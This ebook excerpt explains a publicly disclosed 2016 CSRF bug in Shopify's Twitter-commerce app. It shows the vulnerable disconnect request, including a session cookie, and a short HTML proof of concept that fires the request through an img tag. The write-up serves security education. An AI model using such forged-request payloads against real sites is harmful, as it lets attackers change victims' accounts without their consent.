Shopify Twitter disconnect

On February 1st, 2016, a researcher named Akhil Reni published a CSRF vulnerability that allows a malicious user to disconnect Shopify's profiles from Twitter.

The vulnerable request that Akhil Reni analyzed is the following:

GET /auth/twitter/disconnect HTTP/1.1
Host: twitter-commerce.shopifyapps.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html, application/xhtml+xml, application/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://twitter-commerce.shopifyapps.com/account
Cookie: _twitter-commerce_session=bmpuTE5EdnUvYUU0eGxJRk1kMWo5WkI3Wmh1clJkempOTDcya2R3eFNIMG8zWGdpenMvTXY4eFczTWUrNGRQeXV4ZGVycEVtTDZWcFZVbEg1eEtFQjhzSEJVbkM5K05VUVJaeHVtNXBnNTJCNTdwZ2hLL0x0Kyt4eUVlSjRIOWdYTkcwd1NQWWJnbjRNaTF5UXlwa1ZIUlAwR1JmZ1Y5WmRvN2ZHWFY5REZSUmlsR0lnMHZlSjR1OTlTMW5xWDdZRnVGSnBSeEhqbWpNS3lYZmxBNjZoVE00L3pQT2NMd1NONkdwb2pkMXhDS1E2M2RXYlovZjYwaUZnV0JQKzQySlN0MTNKNG55Zlg2azFDdVJJL3RidmJMM0VJNmRVejhZbjVDTnFZNmxFN0k9LS1lY1Y2dnpBZTJCalZzS014SldFUllBPT0%3D--77463ef21e4c8ef530f466db49f78b8e1c2e1129; _ga=GA1.2.469272249.1453024796; _gat=1
    Connection: keep-alive

From this request, we can see that the application is calling the disconnect method, which is part of the Twitter API, but if you try to access this method directly, Twitter will send you an error message, because you need a previously established session. This session is stored in a cookie, which is sent in the same request. Akhil Reni used the following proof of concept to exploit the vulnerability:

<html> 
<body> 
 <img src="https://twitter-commerce.shopifyapps.com/auth/twitter/disconnect"> 
  </body> 
</html>

In this snippet of code, you can find one of most common CSRF exploitation methods: including the request in an <img> tag.

This is a very interesting thing, since all the resources you ask to a server are always GET requests, even an image. If you look at your HTTP proxy, each time an application requests an image, it appears as a GET request. So, including the URL in this tag will cause an error, but the GET request will be made, which executes the CSRF attack.

The tip to find vulnerabilities such as this is to look at how the methods are called in each request, and test all of them.

If you want to read more about this bug, visit https://hackerone.com/reports/111216.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.117.12.192